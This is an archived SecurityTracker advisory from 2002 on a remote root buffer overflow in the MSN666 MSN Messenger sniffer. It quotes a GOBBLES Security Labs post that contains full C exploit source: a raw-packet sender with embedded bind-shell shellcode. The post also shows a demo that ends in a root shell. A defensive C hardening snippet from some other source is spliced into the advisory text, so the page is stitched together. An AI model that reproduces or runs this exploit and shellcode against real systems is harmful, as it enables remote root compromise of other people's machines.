SecurityTracker.com
SecurityTracker
Archives

Category:   Application (Generic)  >   MSN666
Vendors:   Seo, Seunghyun
(Exploit Code is Available) Re: MSN666 Sniffer For MSN Messenger Traffic Has Buffer Overflow That Lets Remote Users Execute Arbitrary Code on the Sniffer to Gain Root Access
SecurityTracker Alert ID:  1004577
SecurityTracker URL:  http://securitytracker.com/id/1004577
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 19 2002
Impact:   Execution of arbitrary code via network, Root access via network
Exploit Included:  Yes  

Description:   GOBBLES Security Labs reported a buffer overflow vulnerability in the MSN666 network sniffer for capturing MSN Messenger traffic. A remote user can execute arbitrary code on the sniffer with root level privileges.

The buffer overflow reportedly resides in the pattern2() function in the 'msn666.c' file. A sscanf() call with an unbounded "%s" conversion writes a string into a 16 character stack variable without checking the length of the string. The string is taken from the payload of the sniffed IP packet and may be longer than 16 characters. This section of code is reportedly reached whenever a sniffed packet has the TCP PSH flag set.

A remote user can send a specially crafted TCP packet with the PSH flag set and destined for an arbitrary host on the MSN Messenger port (1863) to trigger the buffer overflow and overwrite the EIP address on the host running the MSN666 sniffer. This allows the remote user to execute arbitrary code on the vulnerable host.
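As an added defender-side illustration, not code from the advisory or from msn666 itself, the C below shows a bounded replacement for the opmsg extraction described above, together with a check for the overflow condition. Only pattern2() and the 16-byte opmsg buffer come from the advisory; the function names and the constructed payloads are assumptions.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define OPMSG_LEN 16   /* size of opmsg[] in the advisory's pattern2() */

/* Length of the first whitespace-delimited token in a buffer that is NOT
 * assumed to be NUL-terminated (a sniffed TCP payload, bounded by size). */
size_t first_token_len(const char *msg, size_t size)
{
    size_t i = 0, start;
    while (i < size && isspace((unsigned char)msg[i])) i++;
    start = i;
    while (i < size && msg[i] != '\0' && !isspace((unsigned char)msg[i])) i++;
    return i - start;
}

/* 1 if the payload's first token would overflow a 16-byte sscanf("%s")
 * target (15 chars + NUL), i.e. the condition the advisory describes. */
int would_overflow_opmsg(const char *msg, size_t size)
{
    return first_token_len(msg, size) > (size_t)(OPMSG_LEN - 1);
}

/* Hardened extraction: copies at most 15 chars, always NUL-terminates, and
 * returns -1 on an empty or overlong token instead of truncating silently. */
int extract_opcode(const char *msg, size_t size, char opmsg[OPMSG_LEN])
{
    size_t i = 0, len;
    while (i < size && isspace((unsigned char)msg[i])) i++;
    len = first_token_len(msg + i, size - i);
    if (len == 0 || len > (size_t)(OPMSG_LEN - 1)) return -1;
    memcpy(opmsg, msg + i, len);
    opmsg[len] = '\0';
    return 0;
}

/* Minimal fix for the original call site when msg IS NUL-terminated: a field
 * width caps the write at 15 chars + NUL; overlong tokens are truncated. */
int extract_opcode_sscanf(const char *msg, char opmsg[OPMSG_LEN])
{
    return sscanf(msg, "%15s", opmsg) == 1 ? 0 : -1;
}
```

The truncating sscanf variant stops the memory corruption but still accepts a mangled opcode, so the rejecting version is the one a sniffer that parses untrusted traffic should use.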

A demonstration exploit is provided in the Source Message.

Impact:   A remote user can cause arbitrary code to be executed by the sniffer. Because the sniffer runs with root level privileges, the remote user can then gain root access on the system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  underground.or.kr/project/msn666/
Cause:   Boundary error
Underlying OS:  Linux (Any)

Message History:   This archive entry is a follow-up to the message listed below.
Jun 14 2002 MSN666 Sniffer For MSN Messenger Traffic Has Buffer Overflow That Lets Remote Users Execute Arbitrary Code on the Sniffer to Gain Root Access



 Source Message Contents

Subject:  UPDATE UPDATE UPDATE UPDATE UPDATE UPDATE




 ++++++++ALERT++++++++ALERT++++++++ALERT++++++++ALERT++++++++
++++STILL BACKDOOR IN MSN666 MSN SNIFFER FOR SNIFFING MSN+++++
 ++++++++ALERT++++++++ALERT++++++++ALERT++++++++ALERT++++++++


+EMERGENCY+++

After disclosing malicious backdoor root hole in msn666 sniffer
for sniffing msn yesterday, GOBBLES notice following in he inbox:

...

<QUOTE>

What about the version posted today?

http://underground.or.kr/project/msn666/msn666-1.0.1.tar.gz

Thanks!

- ---
Dustin Miller, President
SharePoint Experts, a division of FuseWerx LTD
http://www.sharepointexperts.com/
http://www.fusewerx.com/

</QUOTE>


Thank you Mr. President! GOBBLES get right on it hehehe ;PPppPP

Then we also see this:

Message-ID: <001801c213b4$b3563e90$6401a8c0@SEONUS>
From: "Seunghyun Seo" <s1980914@inhavision.inha.ac.kr>
To: <gobbles@hushmail.com>, <camis@mweb.co.za>
Cc: <bugtraq@securityfocus.com>, <vuln-dev@securityfocus.com>,
        <bugs@securitytracker.com>, <vulnwatch@vulnwatch.org>,
        <submissions@packetstormsecurity.org>, <GOBBLES@hushmail.com>
References: <200206132342.g5DNgvc54973@mailserver4.hushmail.com>
Subject: Re: +ALERT+ BACKDOOR IN MSN666 SNIFFER FOR SNIFFING MSN +ALERT+
Date: Sat, 15 Jun 2002 00:03:46 +0900
Organization: khdp.org, underground.or.kr


I'm writer of msn666 msn message sniffer,
there are no problems, and no backdoors in it,
if you read the code and procedure of it in detail then you could notice it rightly.

Check msn666-1.0.0.tar.gz  and msn666-1.0.1.tar.gz
at http://underground.or.kr/project/msn666/  again.
My previous attached file needs revision.

...

And still see bugs? in code... HRM!?!?!


+ALERT+++

Backdoor still present in updated version of msn666 sniffer for
sniffing msn.

+DETAILS+++

GOBBLES-scan-incoming detect following in incoming backdoor package
of updated msn666 sniffer for sniffing msn version 1.0.1:

msn666.c:

...

void
pattern2 ( char *msg, int size )
{
        char opmsg[16];

...

        sscanf ( msg, "%s", &opmsg );

...

It still called like this from runpkt():

...

        if ( (int)htons(tcp->dest) == 1863 || ok_flg ) {

...

        if ( tcp->psh ) {
                memcpy ( buf, data, sizeof(buf) );
                pattern2( buf, htons(ip->tot_len)-40 );
...

GOBBLES think it quite obvious this is still malicious root backdoor
in msn666 sniffer for sniffing msn.

+EXPLOIT CODE+++

Now that GOBBLES save he friends of team bugtraq from malicious backdoor
root hole in msn666 sniffer for sniffing msn version 1.0.0 and msn666
sniffer for sniffing msn version 1.0.1 it is time to release he exploit
code:

/*
 * disclaimer:
 *
 * GOBBLES SECURITY LABS (GSL) members working
 * on version with -m capabilities. Utilizing libnet.
 *
 * GOBBLES <3 ROUTE
 *
 * This version proves point that even two year
 * old can write remote exploit. Somehow, this
 * horribly written code by Alicia's 2 year old
 * adopted korean nephew works. Remember if you
 * flame this code, you're mocking a 2 year old
 * with more skill than you.
 *
 * There is nothing special about having the ability
 * to write remote root xploits.
 *
 */
/*
 * GOBBLES-own-msn666.c (Quack Sang edition)
 *
 */

// #include <libnet.h>

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>

#define DADA 0x90

char nappytime[256], treattreat[] =
        // GOBBLES use Taeho shellcode because he speak turkey, hehehe
        // Hello friend Taeho Oh! Come pick up shirt at Defcon@!@!
        "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
        "\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
        "\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
        "\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
        "\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
        "\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
        "\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
        "\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
        "\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
        "\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
        "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
        "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";


int
main(int argc, char **argv)
{
        struct sockaddr_in playtime;
        struct hostent *poopoo;
        struct iphdr *peepee;
        struct tcphdr *noodlemmm;
        int phewwy, banana, yes = 1;
        char *diaper, *googoo, *store;

        if(argc != 4) {
                fprintf(stdout, "%s <shellcode_address> <source_ip> <dest_host>\n", argv[0]);
                exit(1);
        }

        sscanf(argv[1], "%p", &store);

        banana = (sizeof(struct iphdr) + sizeof(struct tcphdr) + strlen(treattreat) + sizeof(nappytime) + 24 + 1);
        diaper = malloc(banana);
        googoo = (char *) (diaper + sizeof(struct iphdr) + sizeof(struct tcphdr));

        peepee = (struct iphdr *) diaper;
        noodlemmm = (struct tcphdr *) (diaper + sizeof(struct iphdr));

        memset(diaper, '\0', banana);
        memset(googoo, 'x', 16);
        *(long *)&googoo[16] = (long)store;
        *(long *)&googoo[20] = (long)store;
        memset(nappytime, DADA, sizeof(nappytime));
        memcpy(googoo+24, nappytime, strlen(nappytime));
        memcpy(googoo+24+strlen(nappytime), treattreat, strlen(treattreat));

        if((poopoo = gethostbyname(argv[3])) == NULL) {
                perror(";PPppPPpPp");
                exit(1);
        }

        if((phewwy = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
                perror(";PPpPPpPP");
                exit(1);
        }

        if (setsockopt(phewwy, IPPROTO_IP, IP_HDRINCL, (char *)&yes, sizeof(yes)) == -1) {
                perror(";PPppPPPp");
                exit(1);
        }

        /* hihihihihi */
        peepee->version = 4;
        peepee->ihl = 5;
        peepee->tot_len = htons(banana);
        peepee->id = htons(getpid());
        peepee->frag_off = 0;
        peepee->ttl = 255;
        peepee->protocol = IPPROTO_TCP;
        peepee->check = 0;
        peepee->saddr = inet_addr(argv[2]);
        /* giggle */
        peepee->daddr = inet_addr(inet_ntoa(*((struct in_addr *)poopoo->h_addr)));
        /* dewty diapey?!? */
        noodlemmm->source = htons(9999);
        noodlemmm->dest = htons(1863);
        noodlemmm->seq = random();
        noodlemmm->doff = 5;
        noodlemmm->syn = 0;
        noodlemmm->window = htons(8888);
        noodlemmm->psh = 1;

        playtime.sin_family = AF_INET;
        playtime.sin_port = noodlemmm->dest;
        playtime.sin_addr = *((struct in_addr *)poopoo->h_addr);
        memset(&(playtime.sin_zero), '\0', 8);


        if((sendto(phewwy, diaper, banana, 0, (struct sockaddr *)&playtime, sizeof(struct sockaddr))) == -1) {
                perror(";PPpPPPppPP");
                exit(1);
        }
        else {
                fprintf(stdout, "!@# GOBBLES-own-msn666 (Quack Sang edition) packet sent !@#\n");
                exit(0);
        }
}



+PROOF OF CONCEPT+++

GOBBLES run msn666 sniffer for sniffing msn version 1.0.1 on he Local
Area Network (LAN) once again to prove point:

# ./msn666


Then GOBBLES run he Quack Sang version of GOBBLES-own-msn666.c:

# ./GOBBLES-own-msn666 0xbfffd6d0 192.168.0.1 192.168.0.2
!@# GOBBLES-own-msn666 (Quack Sang edition) packet sent !@#
# nc 192.168.0.2 30464
id
uid=0(root) gid=0(root) groups=0(root)



+GREETZ+++
Dave Ahmed for sorting out the mess for us.  Look for us at
defcon, we've got a special tshirt just for you!

All our friends who have already emailed us with their thanks
for saving them from this sneaky backdoor.  Hopefully, now that
the Quack Sang exploit is now private, it'll encourage people
to stop running the software and to those naughty people who
think sniffing is an ethical action (mailsnarf anyone?), will
get what they deserve.

GOBBLES Security
http://www.bugtraq.org
http://www.immunitysec.com/GOBBLES/ <- first official mirror,
                                       thanks so much Dave!

Copyright 2021, SecurityGlobal.net LLC